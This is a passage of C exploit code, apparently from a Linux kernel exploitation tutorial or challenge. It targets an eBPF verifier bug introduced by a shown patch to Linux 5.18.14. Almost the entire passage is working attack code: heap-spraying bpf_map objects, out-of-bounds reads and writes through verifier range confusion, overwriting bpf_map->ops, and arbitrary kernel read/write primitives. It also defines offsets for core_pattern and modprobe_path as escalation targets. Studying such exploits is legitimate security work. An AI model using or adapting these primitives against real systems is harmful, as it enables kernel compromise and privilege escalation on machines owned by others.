  bpf_map_addr = leak_bpf_map_addr();
  printf("[+] bpf_map_addr: 0x%016lx, &bpf_map_elem = 0x%016lx\n", bpf_map_addr,
         bpf_map_addr + 0x110);

  return 0;
}

Leak addr of struct bpf_map using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = map_elem
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6),  // arg3 = r6 == map_elem
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4,
                    0xf1 - 1),  // arg4 = (0xf1-1) * arg4 == (actual_val=0xf1-1;
                                // val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0xf1; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf1; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  char buf[0x100] = {
      0,
  };
  // Overwrite low byte of bpf_map->ops
  // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63)
  memset(buf, 'a', 0xf0);
  buf[0xf0] = 0xa0 - 8;
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);
}

int corrupted_map_fd;
uint64_t bpf_map_addr;
void find_corrupted_map_and_leak_bpf_map_addr() {
  char verifier_log[0x10000];

  for (int i = 0; i < sizeof(map_spray_fd) / 4; ++i) {
    int cur_map_fd = map_spray_fd[i];
    if (cur_map_fd == mapfd) {
      continue;
    }

    // uint64_t map_val = 0;
    // int ret = bpf_map_update(cur_map_fd, 0, &map_val);
    // printf("ret: 0x%x, val: 0x%lx\n", ret, map_val);

    struct bpf_insn insns[] = {
        // BPF_REG_ARG1 == struct __sk_buff
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                    -0x08),  // *(u64*)(fp-0x08) = skb

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x10 <- 0
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd,
        // fp-0x10) if corrupted
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),
        BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18),

        // arg1(mapfd)
        BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
        // arg2(&key) = fp-0x10 <- 0
        BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
        BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
        // arg3(&val) = fp-0x18 <- return value of map_update_elem or
        // map_lookup_elem.
        BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18),
        // arg4(flags)
        BPF_MOV64_IMM(BPF_REG_ARG4, 0),
        // map_update_elem(mapfd, fp-0x10, fp-0x18, 0)
        BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

        BPF_MOV64_IMM(BPF_REG_0, 0),
        BPF_EXIT_INSN(),
    };

    union bpf_attr prog_attr = {
        .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
        .insn_cnt = sizeof(insns) / sizeof(insns[0]),
        .insns = (uint64_t)insns,
        .license = (uint64_t)"GPL v2",
        .log_level = 2,
        .log_size = sizeof(verifier_log),
        .log_buf = (uint64_t)verifier_log,
    };

    int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
    if (progfd < 0) {
      puts("============[failed reason]============");
      printf("%s\n", verifier_log);
      fatal("bpf(BPF_PROG_LOAD)");
    }

    int socks[2];
    if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
      fatal("socketpair");
    }
    if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
      fatal("setsockopt");
    }

    write(socks[1], "Hello", 5);

    uint64_t val;
    bpf_map_lookup(mapfd, 0, &val);

    close(socks[0]);
    close(socks[1]);
    close(progfd);

    if (val != 0) {
      bpf_map_addr = val - 0x110;
      corrupted_map_fd = cur_map_fd;
      continue;
    }

    close(cur_map_fd);
  }
}

uint64_t aaw64(uint64_t addr, uint64_t val) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0x10),
      // arg3(to) = addr
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP,
                  -0x18),  // arg3 = fp-0x18 == addr
      // arg4(len)
      BPF_MOV64_IMM(BPF_REG_ARG4, 8),
      // skb_load_bytes(skb, 0x10, addr, 8)
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr, val};
  write(socks[1], buf, sizeof(buf));

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return buf[0];
}
uint64_t aar64(uint64_t addr) {
  char verifier_log[0x10000];

  uint64_t map_val = 1;
  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

      BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe),  // r2 = 0x00000000fffffffe
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_2,
                    32),  // r2 = (val=0xfffffffe00000000, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_2,
                    1),  // r2 = (val=0xfffffffe00000001, mask=0)

      // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &
      // (~this.val)).
      // And if r1.mask == (u64)0, __mark_reg_known ->
      // ___mark_reg_known is called.
      // By this calling then r1's min and max will be imm.
      // Because (~0xffffffff00000001) & 0xffffffff00000000 == 0 and
      // (~0xfffffffe00000001) & 0xffffffff00000000 == 0x100000000, we must use
      // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe).
      BPF_ALU64_REG(BPF_OR, BPF_REG_1,
                    BPF_REG_2),  // r1 = (s32_min=1, s32_max=0, u32_min=1,
                                 // u32_max=0).
      BPF_MOV32_REG(BPF_REG_1, BPF_REG_1),  // r1(w1) = (s32_min=1, s32_max=0,
                                            // u32_min=1, u32_max=0).

      BPF_MOV64_REG(
          BPF_REG_2,
          BPF_REG_7),  // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_ALU64_IMM(BPF_AND, BPF_REG_2,
                    0x1),  // r2 = (val=1, mask=0x1)
      BPF_ALU64_REG(BPF_ADD, BPF_REG_1,
                    BPF_REG_2),  // r1 = r1 + r2 == (actual_val = 2; s32_min=1,
                                 // s32_max=1, u32_min=1, u32_max=1) ==
                                 // (actual_val=2; val=1, mask=0)
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_1,
                    -1),  // r1 = r1 + -1 == (actual_val=1; val=0, mask=0)
      BPF_MOV64_REG(BPF_REG_8,
                    BPF_REG_1),  // r8 = r1 == (actual_val=1; val=0, mask=0)

      // arg1(skb)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08),
      // arg2(offset)
      BPF_MOV64_IMM(BPF_REG_ARG2, 0),
      // arg3(to) = fp-0x20
      BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP),      // arg3 = fp
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20),  // arg3 = arg3(fp)-0x20
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6,
                  -0x18),  // *(u64*)(fp-0x18) = arg3 == fp-0x20
      // arg4(len)
      BPF_MOV64_REG(BPF_REG_ARG4,
                    BPF_REG_8),  // arg4 = r8 == (actual_val=1; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_MUL, BPF_REG_ARG4,
          0x10 - 1),  // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0)
      BPF_ALU64_IMM(
          BPF_ADD, BPF_REG_ARG4,
          1),  // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0)
      // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0))
      BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes),  // fp-0x18 = addr

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(&key)
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // arg3(&val)
      BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18),
      // arg4(flags)
      BPF_MOV64_IMM(BPF_REG_ARG4, 0),
      // map_update_elem(mapfd, &key, &val, 0)
      BPF_EMIT_CALL(BPF_FUNC_map_update_elem),

      BPF_MOV64_IMM(BPF_REG_0, 0),
      BPF_EXIT_INSN(),
  };

  union bpf_attr prog_attr = {
      .prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
      .insn_cnt = sizeof(insns) / sizeof(insns[0]),
      .insns = (uint64_t)insns,
      .license = (uint64_t)"GPL v2",
      .log_level = 2,
      .log_size = sizeof(verifier_log),
      .log_buf = (uint64_t)verifier_log,
  };

  int progfd = bpf(BPF_PROG_LOAD, &prog_attr);
  if (progfd < 0) {
    puts("============[failed reason]============");
    printf("%s\n", verifier_log);
    fatal("bpf(BPF_PROG_LOAD)");
  }

  int socks[2];
  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) {
    fatal("socketpair");
  }
  if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(int))) {
    fatal("setsockopt");
  }

  uint64_t buf[] = {0xdeadbeefcafebebe, addr};
  write(socks[1], buf, sizeof(buf));
  bpf_map_lookup(mapfd, 0, &map_val);

  close(socks[0]);
  close(socks[1]);
  close(progfd);

  return map_val;
}

uint64_t bpf_map_addr = 0;

int main() {
  srand(time(NULL));
  char verifier_log[0x10000];

  make_corrupted_map();
  find_corrupted_map_and_leak_bpf_map_addr();

  if (corrupted_map_fd == 0) {
    puts("[-] Failed to find corrupted bpf_map");
    return -1;
  }
  printf("[+] mapfd: %d\n", mapfd);
  printf("[+] corrupted_map_fd: %d\n", corrupted_map_fd);
  printf("[+] bpf_map_addr: 0x%016lx\n", bpf_map_addr);

  puts("[*] Restore corrupted map...");
  uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8;
  aaw64(bpf_map_addr, bpf_map_ops);

  return 0;
}

Leak addr of JIT code using oob read & heap spray

      // Patch location:
//    https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957
// Diff:
//    7957c7957,7958
//    <               __mark_reg32_known(dst_reg, var32_off.value);
//    ---
//    >               // `scalar_min_max_or` will handler the case
//    >               //__mark_reg32_known(dst_reg, var32_off.value);

#include <asm-generic/socket.h>
#include <fcntl.h>
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

#include "bpf_insn.h"

#define KERNEL_BASE 0xffffffff81000000
#define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE)
#define BPF_MAP_OPS_LOOKUP_IDX 12
#define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8)
#define BPF_MAP_OPS_UPDATE_ELEM_IDX 13
#define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \
  (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8)
#define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE)
#define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE)
#define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE)

void get_enter_to_continue(const char* msg) {
  puts(msg);
  getchar();
}

void fatal(const char* msg) {
  perror(msg);
  // get_enter_to_continue("Press enter to exit...");
  exit(-1);
}

int bpf(int cmd, union bpf_attr* attrs) {
  return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs));
}

int bpf_map_create(int val_size, int max_entries) {
  union bpf_attr attr = {
      .map_type = BPF_MAP_TYPE_ARRAY,
      .key_size = sizeof(int),
      .value_size = val_size,
      .max_entries = max_entries,
  };

  int map_fd = bpf(BPF_MAP_CREATE, &attr);
  if (map_fd < 0) {
    fatal("bpf(BPF_MAP_CREATE)");
  }

  return map_fd;
}
int bpf_map_update(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  int res = bpf(BPF_MAP_UPDATE_ELEM, &attr);
  if (res < 0) {
    fatal("bpf(BPF_MAP_UPDATE_ELEM)");
  }

  return res;
}
int bpf_map_lookup(int map_fd, int key, void* pval) {
  union bpf_attr attr = {
      .map_fd = map_fd,
      .key = (uint64_t)&key,
      .value = (uint64_t)pval,
      .flags = BPF_ANY,
  };

  return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

int mapfd;
int map_spray_fd[0x100];
void make_corrupted_map() {
  uint64_t map_val = 1;

  puts("[*] Spray struct bpf_map...");
  for (int i = 0; i < sizeof(map_spray_fd) / 4; i++) {
    map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1);
    bpf_map_update(map_spray_fd[i], 0, &map_val);
  }
  mapfd = map_spray_fd[0x81];

  char verifier_log[0x10000];

  bpf_map_update(mapfd, 0, &map_val);

  struct bpf_insn insns[] = {
      // BPF_REG_ARG1 == struct __sk_buff
      BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1,
                  -0x08),  // *(u64*)(fp-0x08) = skb

      // arg1(mapfd)
      BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
      // arg2(key) = fp-0x10
      BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0),
      BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP),
      BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10),
      // call map_lookup_elem(mapfd, &key(->0))
      BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
      BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),
      BPF_EXIT_INSN(),

      BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),  // r6 = r0 == map_elem
      BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0,
                  0),  // r7 = [r0] == (val=1, mask=0xffffffffffffffff)
      BPF_MOV64_REG(BPF_REG_1, BPF_REG_7),  // r1 = r7
      BPF_ALU64_IMM(BPF_RSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0x00000000ffffffff)
      BPF_ALU64_IMM(BPF_LSH, BPF_REG_1,
                    32),  // r1 = (val=0, mask=0xffffffff00000000)

